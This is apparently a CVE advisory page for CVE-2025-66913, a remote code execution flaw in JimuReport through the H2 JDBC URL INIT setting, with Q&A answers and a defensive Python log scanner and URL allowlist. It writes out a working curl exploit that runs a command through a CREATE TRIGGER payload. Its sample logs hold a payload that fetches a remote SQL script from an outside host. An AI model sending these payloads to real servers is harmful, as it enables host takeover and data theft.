CVE-2025-66913
Remote Code Execution in JimuReport via H2 JDBC URL
Publication date: 2026-01-08
Last updated on: 2026-01-08
Assigner: MITRE
Description
CVSS Scores
EPSS Scores
| Metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| jeecgboot | jimureport | 2.1.3 |
| jeecgboot | jimureport | all versions up to and including 2.1.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability in JimuReport versions up to and including 2.1.3 allows remote code execution because the application does not validate user-supplied JDBC URLs. The `/jmreport/testConnection` API endpoint accepts a `dbUrl` parameter and passes it straight to the selected JDBC driver. When that driver is H2, the URL's `INIT` setting tells the driver to run arbitrary SQL as soon as it connects, and that SQL can be a `CREATE TRIGGER` statement whose body is Java source that H2 compiles and loads at runtime. The attacker's code, for example a `Runtime.getRuntime().exec(...)` call, therefore runs inside the JimuReport JVM with its privileges. The root cause is the missing input validation (CWE-94); H2's trigger mechanism is only the vehicle, and the Java-source variant additionally depends on a Java compiler being reachable from the JimuReport JVM, which a JDK provides. [1, 2]
How can this vulnerability impact me?
This vulnerability allows remote attackers to execute arbitrary code on the server running JimuReport, with the operating-system privileges of the JimuReport process. That can lead to full compromise of the host, theft of report data and of any database credentials the application holds, service disruption, and lateral movement within the network. The CVSS score of 9.8 reported for this issue indicates critical severity with high impact on confidentiality, integrity and availability. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The least intrusive check is inventory: confirm which jimureport version is deployed (releases up to and including 2.1.3 are affected) and whether `/jmreport/testConnection` is reachable from the users and networks you care about. Active testing means sending a crafted POST to that endpoint with a JSON body that selects the H2 driver and supplies an H2 JDBC URL whose `init=` setting creates a trigger with a harmless command (the published example attempts to launch the Windows calculator). For example, with curl:

```
curl -X POST https://<target>/jmreport/testConnection -H 'Content-Type: application/json' -d '{"dbType":"H2","dbDriver":"org.h2.Driver","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER UNAM4 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ void UNAM4() throws Exception{ Runtime.getRuntime().exec(\"cmd /c calc\"); }$$","dbUsername":"","dbPassword":""}'
```

Two caveats apply. The command runs blind inside the server JVM, so the HTTP response alone does not show whether it executed, and `cmd /c calc` is only meaningful on a Windows host; on Linux it fails silently. For a reliable signal, use a command whose effect you can observe independently, such as a request to an HTTP or DNS listener you control, or check the host for the side effect afterwards. A response with no validation error (or a "connection succeeded" message) is nonetheless strong evidence that the URL was handed to the driver unvalidated, which is the vulnerable condition. On the passive side, review access logs for POST requests to `/jmreport/testConnection` whose body contains `jdbc:h2:` together with an `init=` setting or `CREATE TRIGGER`; any such request from an unexpected source is an exploitation attempt. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps:
1. Restrict access to the `/jmreport/testConnection` endpoint: require an authenticated, privileged user, and if the datasource test feature is not needed, disable the endpoint entirely.
2. Validate the `dbUrl` parameter server-side. A blocklist for `INIT`, `CREATE TRIGGER` and similar tokens is only a stopgap, since case variations and alternative H2 statements get around it; the robust fix is an allowlist of permitted drivers, URL prefixes and connection parameters, with the H2 driver excluded unless it is genuinely needed.
3. Upgrade jimureport to a release later than 2.1.3 that fixes this issue, if one is available.
4. Monitor and audit logs for requests to `/jmreport/testConnection`, in particular bodies containing `jdbc:h2:` together with `init=` or `CREATE TRIGGER`, and treat them as exploitation attempts.
5. If upgrading is not immediately possible, add network-level controls (firewall rules, reverse-proxy path rules) so that only trusted addresses can reach the endpoint. [1, 2]
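The following is an added example, not code from JimuReport or from the advisory, covering both the detection approach described under the detection question and the validation step in the mitigation list above. It scans constructed access-log lines for `/jmreport/testConnection` requests carrying an H2 `INIT` setting or code-loading SQL, and it implements the `dbUrl` check as a deny-by-default allowlist (going beyond the blocklist the text suggests). The log line format, client addresses, hostnames, the driver allowlist and the permitted parameter names are all assumptions made for this example.

```python
"""Added example for CVE-2025-66913 (JimuReport /jmreport/testConnection).

Two pieces, neither taken from JimuReport itself:
  * a detection scanner that flags testConnection requests whose dbUrl
    carries an H2 INIT setting or code-loading SQL, and
  * an allowlist validator a hardened handler could apply to dbDriver/dbUrl.
Log format, client IPs, hostnames and allowlist contents are constructed
assumptions for this example."""
import json
import re
from urllib.parse import unquote

# H2's INIT connection setting runs SQL on connect; CREATE TRIGGER / CREATE
# ALIAS with inline source and RUNSCRIPT FROM are the statements that turn
# that into code loading. Matched on the raw, URL-decoded string rather than
# through a URL parser so that escaping such as "\;" cannot hide the setting.
H2_INIT_RE = re.compile(r"(?i)(?:^|[;&\s\\])init\s*=")
CODE_LOADING_SQL_RE = re.compile(
    r"(?i)\b(?:CREATE\s+(?:OR\s+REPLACE\s+)?(?:TRIGGER|ALIAS)|RUNSCRIPT\s+FROM)\b"
)


def is_suspicious_db_url(db_url: str) -> bool:
    """Detection heuristic; a miss here is not proof that the URL is benign."""
    url = unquote(db_url)
    return bool(H2_INIT_RE.search(url) or CODE_LOADING_SQL_RE.search(url))


def scan_log(lines):
    """Return (timestamp, client, dbUrl) for each POST to /jmreport/testConnection
    whose JSON body has a suspicious dbUrl. Assumed line format (constructed):
    '<timestamp> <client-ip> <method> <path> <raw-json-body>'."""
    hits = []
    for line in lines:
        fields = line.split(" ", 4)
        if len(fields) < 5:
            continue
        ts, client, method, path, body = fields
        if method != "POST" or path.split("?", 1)[0] != "/jmreport/testConnection":
            continue
        try:
            params = json.loads(body)  # JSON escapes are decoded here, before matching
        except json.JSONDecodeError:
            continue
        db_url = str(params.get("dbUrl", ""))
        if is_suspicious_db_url(db_url):
            hits.append((ts, client, db_url))
    return hits


# Mitigation: deny by default. Driver -> (required URL prefix, parameter
# separator, parameters a report datasource legitimately needs). The H2 driver
# is deliberately absent; add it only with an explicit, empty parameter set.
ALLOWED_DRIVERS = {
    "com.mysql.cj.jdbc.Driver": ("jdbc:mysql://", "?", {"useSSL", "serverTimezone", "characterEncoding"}),
    "org.postgresql.Driver": ("jdbc:postgresql://", "?", {"ssl", "sslmode", "currentSchema"}),
}
HOST_DB_RE = re.compile(r"[A-Za-z0-9.\-]+(?::\d{1,5})?/[A-Za-z0-9_]+")
PARAM_VALUE_RE = re.compile(r"[A-Za-z0-9_.\-/]+")


def validate_jdbc_url(db_driver: str, db_url: str):
    """Return (True, None) if the URL is acceptable, else (False, reason)."""
    rule = ALLOWED_DRIVERS.get(db_driver)
    if rule is None:
        return False, "driver not on allowlist"
    prefix, sep, allowed_params = rule
    if not db_url.startswith(prefix):
        return False, "url prefix does not match driver"
    if ";" in db_url or "%" in db_url:
        return False, "driver-level settings or encoded characters are not allowed"
    base, _, query = db_url.partition(sep)
    if not HOST_DB_RE.fullmatch(base[len(prefix):]):
        return False, "expected host[:port]/database after the prefix"
    for item in (query.split("&") if query else []):
        key, _, value = item.partition("=")
        if key not in allowed_params:
            return False, f"parameter {key!r} not allowed"
        if not PARAM_VALUE_RE.fullmatch(value):
            return False, f"bad value for {key!r}"
    return True, None


# Constructed sample log: two H2 payloads (one URL-encoded) and a benign MySQL test.
SAMPLE_LOG = [
    '2026-01-09T10:12:03Z 203.0.113.7 POST /jmreport/testConnection {"dbType":"H2","dbDriver":"org.h2.Driver","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER T1 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ void t() {} $$","dbUsername":"","dbPassword":""}',
    '2026-01-09T10:12:09Z 198.51.100.4 POST /jmreport/testConnection {"dbType":"MYSQL","dbDriver":"com.mysql.cj.jdbc.Driver","dbUrl":"jdbc:mysql://db.example.internal:3306/reports?useSSL=true","dbUsername":"report","dbPassword":"***"}',
    '2026-01-09T10:12:15Z 203.0.113.7 GET /jmreport/list -',
    '2026-01-09T10:13:40Z 203.0.113.7 POST /jmreport/testConnection {"dbType":"H2","dbDriver":"org.h2.Driver","dbUrl":"jdbc:h2:mem:x;INIT%3DRUNSCRIPT%20FROM%20%27http://203.0.113.7/x.sql%27","dbUsername":"","dbPassword":""}',
]

if __name__ == "__main__":
    for ts, client, url in scan_log(SAMPLE_LOG):
        print(f"{ts} {client} suspicious dbUrl: {url[:70]}")
    for drv, url in [("org.h2.Driver", "jdbc:h2:mem:test;init=SELECT 1"),
                     ("com.mysql.cj.jdbc.Driver", "jdbc:mysql://db.example.internal:3306/reports?useSSL=true")]:
        print(drv, url, validate_jdbc_url(drv, url))
```

The scanner is intentionally a loose heuristic (it matches the decoded string with regular expressions, so obfuscated SQL can slip past it) and is meant for triage of logs; the validator is the control that actually closes the hole, because it rejects everything that is not an expected driver, host/database shape and parameter set instead of trying to enumerate what is dangerous.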